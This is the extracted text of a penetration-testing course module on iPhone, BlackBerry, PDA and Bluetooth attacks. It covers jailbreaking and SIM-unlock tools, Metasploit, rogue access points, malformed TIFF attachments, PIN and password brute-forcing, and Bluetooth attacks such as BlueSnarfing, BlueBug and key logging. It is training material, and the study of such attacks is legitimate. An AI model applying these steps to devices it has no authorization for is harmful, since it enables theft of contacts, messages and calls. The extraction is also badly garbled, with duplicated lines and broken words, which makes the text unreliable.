LPTv4 module 37 blue tooth and hand held device penetration testing formatted

Penetration Testing Roadmap Penetration Testing Log Management Penetration Testing File Integrity Checking Bluetooth and Hand held Device Penetration Testing Telecommunication And Broa

ECSA/ LPT

Bluetooth an d H an d H eld Device Pen etration Testin g

Penetration Testing Roadmap

Start Here

Gathering Analysis Penetration Testing

Firewall

Penetration Testing

Router and Switches

Penetration Testing

Internal Network

Penetration Testing

IDS

Penetration Testing

Wireless Network

Penetration Testing

Denial of Service

Penetration Testing

Password Cracking

Stolen Laptop, PDAs and Cell Phones

Social Engineering Application

Cont’d

Penetration Testing Penetration Testing Penetration Testing

Penetration Testing

Penetration Testing Roadmap

Penetration Testing

Log Management

Penetration Testing

File Integrity Checking

Bluetooth and Hand held Device

Penetration Testing

Telecommunication And Broadband Communication

Email Security

Penetration Testing

Security Patches

Penetration Testing

iPhone

Jailbreaking in an iPhone

Jailbreaking is the process to unlock the

iPhone and iPod touch devices to permit the p

installation of third-party applications.

Steps for iPhone Penetration

Testing

1 • Try to jailbreak the iPhone

2 • Try to unlock the iPhone

3 • Try to activate the voicemail button on your unlocked iPhone

• Try to hack iPhone using Metasploit

5 • Check for access point with same name and encryption type

6 • Check whether malformed data can be sent to the device

7 • Check whether basic memory mapping information can be extracted

Step 1: Try to Jailbreak the

iPhone

Jailbreak the iPhone using different jailbreaking

tools such as iDemocracy, iActivator, and

iFuntastic.

Jailbreaking Using iFuntastic

Download the iPhone hacking kit, and install iFuntastic in your applications folder

After installing, perform the following steps:

Reboot your Mac safely, so that the iFuntastic is not crushed during this process

Switch on your iPhone and then connect it into your Mac by using the appropriate

Press the Prepare button present on the left side of the iFuntastic window

Click the Jailbreak button present at the bottom of the window

Follow the six steps on the next page of the window You will see the screenshot as given in the next slide

Jailbreaking Using iFuntastic

Jailbreaking using AppSnapp

Go to http://www.jailbreakme.com on your iPhone or iPod Touch to automatically jailbreak

and put Installer.app on the device p pp

At the bottom of the page, click the Install AppSnap button, then you will see the “Slide to

Unlock” screen

After unlocking the device, you will find the “Installer” icon on your screen, click the

“I ll ” i h li k “S ” d i ll h “C i S ” k

“Installer” icon, then click “Sources”, and install the “Community Sources” package

Under the “System” tab install the BDS subsystem and openSSH Under the System tab, install the BDS subsystem,and openSSH

Now your iPhone is ready to receive and use the third-party binaries

Tool for Jailbreaking:

iDemocracy

iDemocracy is the iPhone jailbreak and third party

app installation solution for the Window’s platform

It installs Installer.app (for 3rd party apps/games),

custom ringtones, and SIM unlock

It has new features like free ringtones on firmwares

as well as File Browsing

as well as File Browsing

iDemocracy: Screenshot

Tool for Jailbreaking: iActivator

iActivator is a Cocoa-based application for the Mac

iActivator is a graphical interface providing iPhone

activation/deactivation tools and methods for breaking/restoring the

jail

iActivator: Screenshot

Tool for Jailbreaking:

iNdependence

iNdependence is a Cocoa-p

based application for Mac

OS X which provides an easy-to-use interface for

j ilb k ti ti SSH

It allows unauthorized third-party application installation on your

iPh

jailbreak, activation, SSH installation, and ringtone

iPhone

Step 2: Try to Unlock the iPhone

Unlock the iPhone using tools such as

iPhoneSimFree and anySIM.

Tool to Unlock iPhone: anySIM

anySIM is a GUI-based SIM unlocking

solution for iPhone.

This is for iPhones working with OS v1.1.1

running on it or iPhones that were

upgraded from 1.0.2 to 1.1.1.

It is described as fully automatic, requiring

only to be copied to a "jailbroken" iPhone

and launched from the Springboard’s

interface

interface.

Unlocking your iPhone using

AnySIM

Jailbreak your iPhone with iActivator or iNdependence.

Set it up to install third-party applications.

Use the following steps to put AnySIM on it:

1 Download AnySIM 1.1 and extract it

2 Move the “anySIM” file to the applications folder.

3 O t i l (l t d i / li ti / tiliti ) d t th

3 Open terminal (located in /applications/utilities) and type the following:

scp -r /Applications/anySIM.app root@IPADDRESS:/Applications/

root@IPADDRESS:/Applications/

Where, IPADDRESS is the IP Address of your iPhone

4 Restart your iPhone.

5 Run the AnySIM application to unlock your iPhone.

Step 3: Try to Activate the Voicemail Button on your Unlocked iPhone

Get the voicemail number of your carrier

Dial: *5005*86*xxx#

Get the voicemail number of your carrier

Dial: *5005*86*xxx#

Where xxx is your voicemail number

Tap the call

Click on the voicemail button, which automatically calls

to your voicemail service

to your voicemail service

Step 4: Try to Hack iPhone using

Metasploit

h l i l l i h l bili i i

Use the Metasploit tool to exploit the vulnerabilities in

iPhone.

This allows the attacker to:

• Control an iPhone remotely

• Gain root access to the iPhone

• Remotely access recently modified files

• Access stored emails

• View the iPhone's web browsing historyView the iPhone s web browsing history

Step 5: Check for Access Point with Same Name and Encryption Type

iPhone identifies the access points by SSID

If the user gets attacker-controlled accesspoint with the same name and encryptiontype, iPhone will automatically use themalicious access point

This adds the exploit to web page browser,and replaces it with a page containing the

l itexploit

Step 6: Check Whether Malformed Data Can be Sent to the Device

Perform this attack on iPhone with a MobileSafari

browser

Extract the binaries from the device by jailbreaking

Extract the binaries from the device by jailbreaking

Analyze the binaries by using a disassembler such asy y g

diStorm64

Perform the source code audit

Perform the source code audit

Send the malformed data to the device to cause a fault

and make it crash

Step 7: Check Whether Basic Memory

It id i t l Run the Mac OS X crash

reporter.

It provides register values

and basic memory mapping information.

BlackBerry

Vulnerabilities in BlackBerry

A boundary error exists in the attachment service while handling they g

malformed TIFF image attachments

While handling the Server Routing Protocol (SRP) packets, some errors

are committed:

• This vulnerability interrupts the communication between BlackBerry

Enterprise Server and BlackBerry Router, resulting into a DoS attack.

Boundary error exists in the attachment service while handling the

malformed Microsoft Word (.doc) file:

• This vulnerability results into buffer overflow and the arbitrary code is

• This vulnerability results into buffer overflow and the arbitrary code is

Steps for Penetration Testing

1: Try Blackjacking on a BlackBerry

T t tt k b di lf d TIFF 2: Try to attack by sending malformed TIFF

image files

Step 1: Try Blackjacking on

BlackBerry

Blackjacking is a method of hijacking BlackBerry

connection.

Use BBProxy tool to conduct the Blackjacking.

Install BBProxy on a user’s BlackBerry

When this tool is activated, it creates a covert

channel between the attacker and the hosts of an

channel between the attacker and the hosts of an

unsecured enterprise network.

Step 2: Try to Attack by Sending Malformed TIFF Image Files

There is a heap overflow vulnerability in the BlackBerry attachment service when handling TIFF image files.

Send the malformed TIFF image file to the

’ Bl kB d i

TIG Image

user’s BlackBerry device.

Once the user opens attached TIFF file, it causes a DoS attack.

Personal Digital Assistant

(PDA)

• After accessing the password, an attacker can steal private information or unleash the malicious code.

Steps for Penetration Testing

• Check whether passwords can be cracked

1 Check whether passwords can be cracked

2 • Try for ActiveSync attacks

3 • Check whether IR Port is enabled

4 • Check whether the encrypted data can be decrypted

Step 1: Check Whether Passwords

can be Cracked

Most users store their private data without

giving password to their device

giving password to their device

T diff t d ki t l h

Try different password cracking tools such as

Brutus and Hydra to crack the password for

the device

Step 2: Try for ActiveSync Attacks

A ti S ll t tt t li it d b f

ActiveSync allows user to attempt unlimited numbers of

password in its prompt.

Perform brute-force and dictionary attacks or apply the

password cracking tools such as Brutus and Cain & Abel

to access an ActiveSync password.

Step 3: Check Whether IR Port

are Enabled

An infrared port is used to

synchronize the PDA or for to share

the information from one device to

another

Check whether the infrared port for

PDA devices are enabled or not

If enabled, try to accept the

commands remotely, and send the

malicious software to access the

personal information

Step 4: Check Whether Encrypted

Data can be Decrypted

Check whether encrypted data can be decrypted or not.

After getting access to the personal information in the PDA, apply different cryptanalysis tools such as Crank and Jipher to

reveal the encrypted information.

l h Bluetooth

Bluetooth: Introduction

Bluetooth is a telecommunications industry specification that describes how

mobile phones computers and personal digital assistants (PDAs) can be easily

interconnected using a short-range wireless connection.

It wirelessly connects mobile phones, portable computers, stereo headsets, MP3

players, and more.

These Bluetooth devices connect and communicate via short range ad hoc

These Bluetooth devices connect and communicate via short-range, ad hoc

networks known as piconets.

Security within Bluetooth itself covers three major areas:

• Authentication.

• Authorization.

Different Attacks in Bluetooth

Different Attacks in Bluetooth

Devices (cont’d)

BlueBug attack:

• BlueBugs are the Bluetooth security loopholes on the Bluetooth enabled devices Attackers exploit these loopholes and access the private and confidential information from the victim’s device.

BTKeylogging attack:

• A BTKeylogging attack is performed if the target keyboard has fixed PIN code and the attacker knows its BD_ADDR (Bluetooth device address).

Bl i i i d f l i h d il b

Blueprinting:

• Blueprinting is used for remotely accessing the details about

Different Attacks in Bluetooth

attacker.

Th i i tt k i ibl if th i i i d d

Short pairing code attacks:

• The pairing attack is possible if the pairing process is eavesdropped

The attacker forces the Bluetooth devices to again perform the pairing process and eavesdrop on it.

• The attacker gets access to the link keys and unit keys (BD_ADDR)

of the Bluetooth devices and interrupts the communication to form

Man-in-the-Middle attacks:

of the Bluetooth devices and interrupts the communication to form

a new communication between both devices posing as the other.

Steps for Penetration Testing in

Bluetooth

1 • Check whether PIN can be cracked

1

2 • Try to perform Blueprinting attack

3 • Check whether you are able to extract the SDP profiles

4 • Try pairing code attacks

5 • Try man-in-the-middle attacks

• Try BlueJacking attacks

6 • Try BlueJacking attacks

Steps for Penetration Testing in

Step 1: Check Whether the PIN

Can be Cracked

Check whether the PIN can be cracked or

not.

Use a brute-force algorithm and online

password cracker brute-force tools such as

Brutus and Hydra.

Use BTCrack for cracking the Bluetooth

PIN and LINK-KEY.

Step 2: Try to Perform a

Blueprinting Attack

Try a Blueprinting attack and try to access the details about the Bluetooth enabled devices remotely

Apply tools such as Blueprint and BTScanner to extract

A k Apply tools such as Blueprint and BTScanner to extract

the details about the other Bluetooth enabled devices:

• Blueprinting give details about:

Attack

p g g

• Bluetooth device address (BD_ADDR).

• Service description records.

• Model of the device.

Step 3: Check Whether you are Able to Extract the SDP Profiles

Check whether you are able to extract the SDP

(Service Discovery Protocol) profiles or not.

Use sdptool and BTScanner tools to extract the

SDP P fil

SDP Profiles.

This SDP profile gi es detail about ser ices

offered by one Bluetooth-enabled device to other

Bluetooth-enabled devices.

Step 4: Try Pairing Code Attacks

Pairing is an important part of Bluetooth that consists of two devices associating with one another.

Eavesdrop the pairing process.

Send the message that you forgot the link key to other device.

Other devices may discard the key and create new pairing session.

Step 5: Try a Man-in-the-Middle

Attack

Try to perform the man in the middle attack

Try to perform the man-in-the-middle attack.

Get access to the link keys and unit keys (BD_ADDR) of the Bluetooth devices and interrupt the communication to form a new communication between both devices posing as the other p g

Step 6: Try a BlueJacking Attack

dif h f ll i i i d i Modify the following security settings on your device:

• Right click on the Bluetooth icon åSelect advanced Right click on the Bluetooth icon åSelect advanced

configuration åClient applications tab

• Select PIM Item Transfer åProperties åUncheck the box for

Secure Connection

Step 6: Try a BlueJacking Attack

• Select name tab, modify the contact details, email ID and

other details, and click OK.

3

• Right-click on the contact and select Action åSend to

BluetoothåOther.

4

• Select the Bluetooth device to which you want to send the

message and click on the Send option.

Step 7: Try a BTKeylogging

Attack

In a BTKeylogging attack, attacker uses keyboard as a

keylogger by intercepting all packets sent via wireless

and decrypting them

Find out the fixed PIN code and BD_ADDR of the

Bl h k b dtarget Bluetooth keyboard

U t l l t i t t th i d

Use a protocol analyzer to intercept the required

information (IN_RAND, LK_RAND, AU_RAND,

SRES, and EN_RAND) to perform the attack

Step 8: Try Bluesmacking -The

Ping of Death

Create a data packet more than the allowable size in the

Bluetooth devices and send it to the victim’s device.

The device receiving the oversized packet works according

to the likes of the attacker.

Step 9: Try a BlueSnarfing Attack

Use the Bluesnarfer tool to perform BlueSnarfing attack.

• Bluesnarfering reveals the following information:

• User’s calendar

• Contact list

• Email

• Text messages

Try a BlueSnarfing Attack

Step 10: Try a BlueBug Attack

Use the Bluediving penetration testing tool to perform a BlueBug Attack

Use the Bluediving penetration testing tool to perform a BlueBug Attack

This tool exploits the loopholes in the Bluetooth and allows the

unauthorized access to the other Bluetooth device

After getting unauthorized access, try to:

• Set call forwards.

• Read SMS from the phone.

• Send SMS to any number.

• Initiate phone calls.

• Write phonebook entries.